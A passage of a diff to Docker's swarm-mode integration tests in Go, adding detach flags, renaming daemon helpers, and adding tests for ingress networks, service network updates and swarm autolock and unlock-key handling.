checker.IsNil, check.Commentf(out)) + out, err = d.Cmd("service", "update", "--detach", "--publish-add", "80:80", name) + c.Assert(err, checker.IsNil) - out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[1], tc.name) - c.Assert(err, checker.IsNil, check.Commentf(out)) + out, err = d.Cmd("service", "update", "--detach", "--publish-add", "80:80", name) + c.Assert(err, checker.IsNil) - out, err = d.cmdRetryOutOfSequence("service", "update", "--publish-add", tc.publishAdd[2], "--publish-add", tc.publishAdd[3], tc.name) - c.Assert(err, checker.NotNil, check.Commentf(out)) + out, err = d.Cmd("service", "update", "--detach", "--publish-add", "80:80", "--publish-add", "80:20", name) + c.Assert(err, checker.NotNil) - out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.EndpointSpec.Ports }}", tc.name) - c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Equals, tc.ports) - } + out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.EndpointSpec.Ports }}", name) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "[{ tcp 80 80 ingress}]") } func (s *DockerSwarmSuite) TestSwarmServiceWithGroup(c *check.C) { d := s.AddDaemon(c, true, true) name := "top" - out, err := d.Cmd("service", "create", "--name", name, "--user", "root:root", "--group", "wheel", "--group", "audio", "--group", "staff", "--group", "777", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--user", "root:root", "--group", "wheel", "--group", "audio", "--group", "staff", "--group", "777", "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) out, err = d.Cmd("ps", "-q") c.Assert(err, checker.IsNil) @@ -316,7 +330,7 @@ func (s *DockerSwarmSuite) TestSwarmContainerAutoStart(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf(out)) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - d.Restart() + d.Restart(c) out, err = d.Cmd("ps", "-q") c.Assert(err, checker.IsNil, check.Commentf(out)) @@ -330,17 +344,22 @@ func (s *DockerSwarmSuite) TestSwarmContainerEndpointOptions(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf(out)) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - _, err = d.Cmd("run", "-d", "--net=foo", "--name=first", "--net-alias=first-alias", "busybox", "top") + _, err = d.Cmd("run", "-d", "--net=foo", "--name=first", "--net-alias=first-alias", "busybox:glibc", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + _, err = d.Cmd("run", "-d", "--net=foo", "--name=second", "busybox:glibc", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) - _, err = d.Cmd("run", "-d", "--net=foo", "--name=second", "busybox", "top") + _, err = d.Cmd("run", "-d", "--net=foo", "--net-alias=third-alias", "busybox:glibc", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) - // ping first container and its alias + // ping first container and its alias, also ping third and anonymous container by its alias _, err = d.Cmd("exec", "second", "ping", "-c", "1", "first") c.Assert(err, check.IsNil, check.Commentf(out)) _, err = d.Cmd("exec", "second", "ping", "-c", "1", "first-alias") c.Assert(err, check.IsNil, check.Commentf(out)) + _, err = d.Cmd("exec", "second", "ping", "-c", "1", "third-alias") + c.Assert(err, check.IsNil, check.Commentf(out)) } func (s *DockerSwarmSuite) TestSwarmContainerAttachByNetworkId(c *check.C) { @@ -354,12 +373,12 @@ func (s *DockerSwarmSuite) TestSwarmContainerAttachByNetworkId(c *check.C) { out, err = d.Cmd("run", "-d", "--net", networkID, "busybox", "top") c.Assert(err, checker.IsNil) cID := strings.TrimSpace(out) - d.waitRun(cID) + d.WaitRun(cID) _, err = d.Cmd("rm", "-f", cID) c.Assert(err, checker.IsNil) - out, err = d.Cmd("network", "rm", "testnet") + _, err = d.Cmd("network", "rm", "testnet") c.Assert(err, checker.IsNil) checkNetwork := func(*check.C) (interface{}, check.CommentInterface) { @@ -406,7 +425,7 @@ func (s *DockerSwarmSuite) TestOverlayAttachableOnSwarmLeave(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf(out)) // Leave the swarm - err = d.Leave(true) + err = d.SwarmLeave(true) c.Assert(err, checker.IsNil) // Check the container is disconnected @@ -420,14 +439,99 @@ func (s *DockerSwarmSuite) TestOverlayAttachableOnSwarmLeave(c *check.C) { c.Assert(out, checker.Not(checker.Contains), nwName) } -func (s *DockerSwarmSuite) TestSwarmRemoveInternalNetwork(c *check.C) { +func (s *DockerSwarmSuite) TestOverlayAttachableReleaseResourcesOnFailure(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Create attachable network + out, err := d.Cmd("network", "create", "-d", "overlay", "--attachable", "--subnet", "10.10.9.0/24", "ovnet") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Attach a container with specific IP + out, err = d.Cmd("run", "-d", "--network", "ovnet", "--name", "c1", "--ip", "10.10.9.33", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Attempt to attach another container with same IP, must fail + _, err = d.Cmd("run", "-d", "--network", "ovnet", "--name", "c2", "--ip", "10.10.9.33", "busybox", "top") + c.Assert(err, checker.NotNil) + + // Remove first container + out, err = d.Cmd("rm", "-f", "c1") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Verify the network can be removed, no phantom network attachment task left over + out, err = d.Cmd("network", "rm", "ovnet") + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestSwarmIngressNetwork(c *check.C) { d := s.AddDaemon(c, true, true) - name := "ingress" - out, err := d.Cmd("network", "rm", name) + // Ingress network can be removed + removeNetwork := func(name string) *icmd.Result { + return cli.Docker( + cli.Args("-H", d.Sock(), "network", "rm", name), + cli.WithStdin(strings.NewReader("Y"))) + } + + result := removeNetwork("ingress") + result.Assert(c, icmd.Success) + + // And recreated + out, err := d.Cmd("network", "create", "-d", "overlay", "--ingress", "new-ingress") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // But only one is allowed + out, err = d.Cmd("network", "create", "-d", "overlay", "--ingress", "another-ingress") c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Contains, name) - c.Assert(strings.TrimSpace(out), checker.Contains, "is a pre-defined network and cannot be removed") + c.Assert(strings.TrimSpace(out), checker.Contains, "is already present") + + // It cannot be removed if it is being used + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv1", "-p", "9000:8000", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + result = removeNetwork("new-ingress") + result.Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "ingress network cannot be removed because service", + }) + + // But it can be removed once no more services depend on it + out, err = d.Cmd("service", "update", "--detach", "--publish-rm", "9000:8000", "srv1") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + result = removeNetwork("new-ingress") + result.Assert(c, icmd.Success) + + // A service which needs the ingress network cannot be created if no ingress is present + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv2", "-p", "500:500", "busybox", "top") + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, "no ingress network is present") + + // An existing service cannot be updated to use the ingress nw if the nw is not present + out, err = d.Cmd("service", "update", "--detach", "--publish-add", "9000:8000", "srv1") + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Contains, "no ingress network is present") + + // But services which do not need routing mesh can be created regardless + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv3", "--endpoint-mode", "dnsrr", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestSwarmCreateServiceWithNoIngressNetwork(c *check.C) { + d := s.AddDaemon(c, true, true) + + // Remove ingress network + result := cli.Docker( + cli.Args("-H", d.Sock(), "network", "rm", "ingress"), + cli.WithStdin(strings.NewReader("Y"))) + result.Assert(c, icmd.Success) + + // Create a overlay network and launch a service on it + // Make sure nothing panics because ingress network is missing + out, err := d.Cmd("network", "create", "-d", "overlay", "another-network") + c.Assert(err, checker.IsNil, check.Commentf(out)) + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", "srv4", "--network", "another-network", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) } // Test case for #24108, also the case from: @@ -436,7 +540,7 @@ func (s *DockerSwarmSuite) TestSwarmTaskListFilter(c *check.C) { d := s.AddDaemon(c, true, true) name := "redis-cluster-md5" - out, err := d.Cmd("service", "create", "--name", name, "--replicas=3", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--replicas=3", "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") @@ -470,7 +574,7 @@ func (s *DockerSwarmSuite) TestSwarmTaskListFilter(c *check.C) { c.Assert(out, checker.Not(checker.Contains), name+".3") name = "redis-cluster-sha1" - out, err = d.Cmd("service", "create", "--name", name, "--mode=global", "busybox", "top") + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--mode=global", "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") @@ -499,12 +603,12 @@ func (s *DockerSwarmSuite) TestPsListContainersFilterIsTask(c *check.C) { bareID := strings.TrimSpace(out)[:12] // Create a service name := "busybox-top" - out, err = d.Cmd("service", "create", "--name", name, "busybox", "top") + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkServiceRunningTasks(name), checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckServiceRunningTasks(name), checker.Equals, 1) // Filter non-tasks out, err = d.Cmd("ps", "-a", "-q", "--filter=is-task=false") @@ -713,12 +817,12 @@ func (s *DockerSwarmSuite) TestSwarmNetworkPlugin(c *check.C) { func (s *DockerSwarmSuite) TestSwarmServiceEnvFile(c *check.C) { d := s.AddDaemon(c, true, true) - path := filepath.Join(d.folder, "env.txt") + path := filepath.Join(d.Folder, "env.txt") err := ioutil.WriteFile(path, []byte("VAR1=A\nVAR2=A\n"), 0644) c.Assert(err, checker.IsNil) name := "worker" - out, err := d.Cmd("service", "create", "--env-file", path, "--env", "VAR1=B", "--env", "VAR1=C", "--env", "VAR2=", "--env", "VAR2", "--name", name, "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--env-file", path, "--env", "VAR1=B", "--env", "VAR1=C", "--env", "VAR2=", "--env", "VAR2", "--name", name, "busybox", "top") c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") @@ -737,14 +841,14 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTY(c *check.C) { // Without --tty expectedOutput := "none" - out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", ttyCheck) + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", ttyCheck) c.Assert(err, checker.IsNil) // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) // We need to get the container id. - out, err = d.Cmd("ps", "-a", "-q", "--no-trunc") + out, err = d.Cmd("ps", "-q", "--no-trunc") c.Assert(err, checker.IsNil) id := strings.TrimSpace(out) @@ -756,18 +860,18 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTY(c *check.C) { out, err = d.Cmd("service", "rm", name) c.Assert(err, checker.IsNil) // Make sure container has been destroyed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 0) // With --tty expectedOutput = "TTY" - out, err = d.Cmd("service", "create", "--name", name, "--tty", "busybox", "sh", "-c", ttyCheck) + out, err = d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--tty", "busybox", "sh", "-c", ttyCheck) c.Assert(err, checker.IsNil) // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) // We need to get the container id. - out, err = d.Cmd("ps", "-a", "-q", "--no-trunc") + out, err = d.Cmd("ps", "-q", "--no-trunc") c.Assert(err, checker.IsNil) id = strings.TrimSpace(out) @@ -781,17 +885,17 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTYUpdate(c *check.C) { // Create a service name := "top" - _, err := d.Cmd("service", "create", "--name", name, "busybox", "top") + _, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "top") c.Assert(err, checker.IsNil) // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name) c.Assert(err, checker.IsNil) c.Assert(strings.TrimSpace(out), checker.Equals, "false") - _, err = d.Cmd("service", "update", "--tty", name) + _, err = d.Cmd("service", "update", "--detach", "--tty", name) c.Assert(err, checker.IsNil) out, err = d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.TTY }}", name) @@ -799,16 +903,55 @@ func (s *DockerSwarmSuite) TestSwarmServiceTTYUpdate(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Equals, "true") } +func (s *DockerSwarmSuite) TestSwarmServiceNetworkUpdate(c *check.C) { + d := s.AddDaemon(c, true, true) + + result := icmd.RunCmd(d.Command("network", "create", "-d", "overlay", "foo")) + result.Assert(c, icmd.Success) + fooNetwork := strings.TrimSpace(string(result.Combined())) + + result = icmd.RunCmd(d.Command("network", "create", "-d", "overlay", "bar")) + result.Assert(c, icmd.Success) + barNetwork := strings.TrimSpace(string(result.Combined())) + + result = icmd.RunCmd(d.Command("network", "create", "-d", "overlay", "baz")) + result.Assert(c, icmd.Success) + bazNetwork := strings.TrimSpace(string(result.Combined())) + + // Create a service + name := "top" + result = icmd.RunCmd(d.Command("service", "create", "--detach", "--no-resolve-image", "--network", "foo", "--network", "bar", "--name", name, "busybox", "top")) + result.Assert(c, icmd.Success) + + // Make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskNetworks, checker.DeepEquals, + map[string]int{fooNetwork: 1, barNetwork: 1}) + + // Remove a network + result = icmd.RunCmd(d.Command("service", "update", "--detach", "--network-rm", "foo", name)) + result.Assert(c, icmd.Success) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskNetworks, checker.DeepEquals, + map[string]int{barNetwork: 1}) + + // Add a network + result = icmd.RunCmd(d.Command("service", "update", "--detach", "--network-add", "baz", name)) + result.Assert(c, icmd.Success) + + waitAndAssert(c, defaultReconciliationTimeout, d.CheckRunningTaskNetworks, checker.DeepEquals, + map[string]int{barNetwork: 1, bazNetwork: 1}) +} + func (s *DockerSwarmSuite) TestDNSConfig(c *check.C) { d := s.AddDaemon(c, true, true) // Create a service name := "top" - _, err := d.Cmd("service", "create", "--name", name, "--dns=1.2.3.4", "--dns-search=example.com", "--dns-option=timeout:3", "busybox", "top") + _, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "--dns=1.2.3.4", "--dns-search=example.com", "--dns-option=timeout:3", "busybox", "top") c.Assert(err, checker.IsNil) // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) // We need to get the container id. out, err := d.Cmd("ps", "-a", "-q", "--no-trunc") @@ -831,13 +974,13 @@ func (s *DockerSwarmSuite) TestDNSConfigUpdate(c *check.C) { // Create a service name := "top" - _, err := d.Cmd("service", "create", "--name", name, "busybox", "top") + _, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "top") c.Assert(err, checker.IsNil) // Make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) - _, err = d.Cmd("service", "update", "--dns-add=1.2.3.4", "--dns-search-add=example.com", "--dns-option-add=timeout:3", name) + _, err = d.Cmd("service", "update", "--detach", "--dns-add=1.2.3.4", "--dns-search-add=example.com", "--dns-option-add=timeout:3", name) c.Assert(err, checker.IsNil) out, err := d.Cmd("service", "inspect", "--format", "{{ .Spec.TaskTemplate.ContainerSpec.DNSConfig }}", name) @@ -845,6 +988,68 @@ func (s *DockerSwarmSuite) TestDNSConfigUpdate(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Equals, "{[1.2.3.4] [example.com] [timeout:3]}") } +func getNodeStatus(c *check.C, d *daemon.Daemon) swarm.LocalNodeState { + info := d.SwarmInfo(c) + return info.LocalNodeState +} + +func checkKeyIsEncrypted(d *daemon.Daemon) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + keyBytes, err := ioutil.ReadFile(filepath.Join(d.Folder, "root", "swarm", "certificates", "swarm-node.key")) + if err != nil { + return fmt.Errorf("error reading key: %v", err), nil + } + + keyBlock, _ := pem.Decode(keyBytes) + if keyBlock == nil { + return fmt.Errorf("invalid PEM-encoded private key"), nil + } + + return keyutils.IsEncryptedPEMBlock(keyBlock), nil + } +} + +func checkSwarmLockedToUnlocked(c *check.C, d *daemon.Daemon, unlockKey string) { + // Wait for the PEM file to become unencrypted + waitAndAssert(c, defaultReconciliationTimeout, checkKeyIsEncrypted(d), checker.Equals, false) + + d.Restart(c) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) +} + +func checkSwarmUnlockedToLocked(c *check.C, d *daemon.Daemon) { + // Wait for the PEM file to become encrypted + waitAndAssert(c, defaultReconciliationTimeout, checkKeyIsEncrypted(d), checker.Equals, true) + + d.Restart(c) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked) +} + +func (s *DockerSwarmSuite) TestUnlockEngineAndUnlockedSwarm(c *check.C) { + d := s.AddDaemon(c, false, false) + + // unlocking a normal engine should return an error - it does not even ask for the key + cmd := d.Command("swarm", "unlock") + result := icmd.RunCmd(cmd) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + c.Assert(result.Combined(), checker.Contains, "Error: This node is not part of a swarm") + c.Assert(result.Combined(), checker.Not(checker.Contains), "Please enter unlock key") + + _, err := d.Cmd("swarm", "init") + c.Assert(err, checker.IsNil) + + // unlocking an unlocked swarm should return an error - it does not even ask for the key + cmd = d.Command("swarm", "unlock") + result = icmd.RunCmd(cmd) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + }) + c.Assert(result.Combined(), checker.Contains, "Error: swarm is not locked") + c.Assert(result.Combined(), checker.Not(checker.Contains), "Please enter unlock key") +} + func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) { d := s.AddDaemon(c, false, false) @@ -866,30 +1071,26 @@ func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) { outs, err = d.Cmd("swarm", "unlock-key", "-q") c.Assert(outs, checker.Equals, unlockKey+"\n") - info, err := d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) - c.Assert(d.Restart(), checker.IsNil) - - info, err = d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) + // It starts off locked + d.Restart(c) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked) - cmd := d.command("swarm", "unlock") + cmd := d.Command("swarm", "unlock") cmd.Stdin = bytes.NewBufferString("wrong-secret-key") - out, err := cmd.CombinedOutput() - c.Assert(err, checker.NotNil, check.Commentf("out: %v", string(out))) - c.Assert(string(out), checker.Contains, "invalid key") + icmd.RunCmd(cmd).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "invalid key", + }) - cmd = d.command("swarm", "unlock") + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked) + + cmd = d.Command("swarm", "unlock") cmd.Stdin = bytes.NewBufferString(unlockKey) - out, err = cmd.CombinedOutput() - c.Assert(err, checker.IsNil, check.Commentf("out: %v", string(out))) + icmd.RunCmd(cmd).Assert(c, icmd.Success) - info, err = d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) outs, err = d.Cmd("node", "ls") c.Assert(err, checker.IsNil) @@ -898,14 +1099,7 @@ func (s *DockerSwarmSuite) TestSwarmInitLocked(c *check.C) { outs, err = d.Cmd("swarm", "update", "--autolock=false") c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) - // Wait for autolock to be turned off - time.Sleep(time.Second) - - c.Assert(d.Restart(), checker.IsNil) - - info, err = d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + checkSwarmLockedToUnlocked(c, d, unlockKey) outs, err = d.Cmd("node", "ls") c.Assert(err, checker.IsNil) @@ -918,30 +1112,181 @@ func (s *DockerSwarmSuite) TestSwarmLeaveLocked(c *check.C) { outs, err := d.Cmd("swarm", "init", "--autolock") c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) - c.Assert(d.Restart("--swarm-default-advertise-addr=lo"), checker.IsNil) + // It starts off locked + d.Restart(c, "--swarm-default-advertise-addr=lo") - info, err := d.info() - c.Assert(err, checker.IsNil) + info := d.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) outs, _ = d.Cmd("node", "ls") c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") + // `docker swarm leave` a locked swarm without --force will return an error + outs, _ = d.Cmd("swarm", "leave") + c.Assert(outs, checker.Contains, "Swarm is encrypted and locked.") + + // It is OK for user to leave a locked swarm with --force outs, err = d.Cmd("swarm", "leave", "--force") c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) - info, err = d.info() - c.Assert(err, checker.IsNil) + info = d.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) outs, err = d.Cmd("swarm", "init") c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) - info, err = d.info() - c.Assert(err, checker.IsNil) + info = d.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) } +func (s *DockerSwarmSuite) TestSwarmLockUnlockCluster(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, true) + + // they start off unlocked + d2.Restart(c) + c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive) + + // stop this one so it does not get autolock info + d2.Stop(c) + + // enable autolock + outs, err := d1.Cmd("swarm", "update", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + c.Assert(outs, checker.Contains, "docker swarm unlock") + + var unlockKey string + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } + + c.Assert(unlockKey, checker.Not(checker.Equals), "") + + outs, err = d1.Cmd("swarm", "unlock-key", "-q") + c.Assert(outs, checker.Equals, unlockKey+"\n") + + // The ones that got the cluster update should be set to locked + for _, d := range []*daemon.Daemon{d1, d3} { + checkSwarmUnlockedToLocked(c, d) + + cmd := d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + icmd.RunCmd(cmd).Assert(c, icmd.Success) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) + } + + // d2 never got the cluster update, so it is still set to unlocked + d2.Start(c) + c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive) + + // d2 is now set to lock + checkSwarmUnlockedToLocked(c, d2) + + // leave it locked, and set the cluster to no longer autolock + outs, err = d1.Cmd("swarm", "update", "--autolock=false") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + // the ones that got the update are now set to unlocked + for _, d := range []*daemon.Daemon{d1, d3} { + checkSwarmLockedToUnlocked(c, d, unlockKey) + } + + // d2 still locked + c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateLocked) + + // unlock it + cmd := d2.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + icmd.RunCmd(cmd).Assert(c, icmd.Success) + c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive) + + // once it's caught up, d2 is set to not be locked + checkSwarmLockedToUnlocked(c, d2, unlockKey) + + // managers who join now are never set to locked in the first place + d4 := s.AddDaemon(c, true, true) + d4.Restart(c) + c.Assert(getNodeStatus(c, d4), checker.Equals, swarm.LocalNodeStateActive) +} + +func (s *DockerSwarmSuite) TestSwarmJoinPromoteLocked(c *check.C) { + d1 := s.AddDaemon(c, true, true) + + // enable autolock + outs, err := d1.Cmd("swarm", "update", "--autolock") + c.Assert(err, checker.IsNil, check.Commentf("out: %v", outs)) + + c.Assert(outs, checker.Contains, "docker swarm unlock") + + var unlockKey string + for _, line := range strings.Split(outs, "\n") { + if strings.Contains(line, "SWMKEY") { + unlockKey = strings.TrimSpace(line) + break + } + } + + c.Assert(unlockKey, checker.Not(checker.Equals), "") + + outs, err = d1.Cmd("swarm", "unlock-key", "-q") + c.Assert(outs, checker.Equals, unlockKey+"\n") + + // joined workers start off unlocked + d2 := s.AddDaemon(c, true, false) + d2.Restart(c) + c.Assert(getNodeStatus(c, d2), checker.Equals, swarm.LocalNodeStateActive) + + // promote worker + outs, err = d1.Cmd("node", "promote", d2.NodeID()) + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Contains, "promoted to a manager in the swarm") + + // join new manager node + d3 := s.AddDaemon(c, true, true) + + // both new nodes are locked + for _, d := range []*daemon.Daemon{d2, d3} { + checkSwarmUnlockedToLocked(c, d) + + cmd := d.Command("swarm", "unlock") + cmd.Stdin = bytes.NewBufferString(unlockKey) + icmd.RunCmd(cmd).Assert(c, icmd.Success) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateActive) + } + + // demote manager back to worker - workers are not locked + outs, err = d1.Cmd("node", "demote", d3.NodeID()) + c.Assert(err, checker.IsNil) + c.Assert(outs, checker.Contains, "demoted in the swarm") + + // Wait for it to actually be demoted, for the key and cert to be replaced. + // Then restart and assert that the node is not locked. If we don't wait for the cert + // to be replaced, then the node still has the manager TLS key which is still locked + // (because we never want a manager TLS key to be on disk unencrypted if the cluster + // is set to autolock) + waitAndAssert(c, defaultReconciliationTimeout, d3.CheckControlAvailable, checker.False) + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + certBytes, err := ioutil.ReadFile(filepath.Join(d3.Folder, "root", "swarm", "certificates", "swarm-node.crt")) + if err != nil { + return "", check.Commentf("error: %v", err) + } + certs, err := helpers.ParseCertificatesPEM(certBytes) + if err == nil && len(certs) > 0 && len(certs[0].Subject.OrganizationalUnit) > 0 { + return certs[0].Subject.OrganizationalUnit[0], nil + } + return "", check.Commentf("could not get organizational unit from certificate") + }, checker.Equals, "swarm-worker") + + // by now, it should *never* be locked on restart + d3.Restart(c) + c.Assert(getNodeStatus(c, d3), checker.Equals, swarm.LocalNodeStateActive) +} + func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) { d := s.AddDaemon(c, true, true) @@ -972,20 +1317,17 @@ func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) { c.Assert(newUnlockKey, checker.Not(checker.Equals), "") c.Assert(newUnlockKey, checker.Not(checker.Equals), unlockKey) - c.Assert(d.Restart(), checker.IsNil) - - info, err := d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateLocked) + d.Restart(c) + c.Assert(getNodeStatus(c, d), checker.Equals, swarm.LocalNodeStateLocked) outs, _ = d.Cmd("node", "ls") c.Assert(outs, checker.Contains, "Swarm is encrypted and needs to be unlocked") - cmd := d.command("swarm", "unlock") + cmd := d.Command("swarm", "unlock") cmd.Stdin = bytes.NewBufferString(unlockKey) - out, err := cmd.CombinedOutput() + result := icmd.RunCmd(cmd) - if err == nil { + if result.Error == nil { // On occasion, the daemon may not have finished // rotating the KEK before restarting. The test is // intentionally written to explore this behavior. @@ -996,26 +1338,25 @@ func (s *DockerSwarmSuite) TestSwarmRotateUnlockKey(c *check.C) { time.Sleep(3 * time.Second) - c.Assert(d.Restart(), checker.IsNil) + d.Restart(c) - cmd = d.command("swarm", "unlock") + cmd = d.Command("swarm", "unlock") cmd.Stdin = bytes.NewBufferString(unlockKey) - out, err = cmd.CombinedOutput() + result = icmd.RunCmd(cmd) } - c.Assert(err, 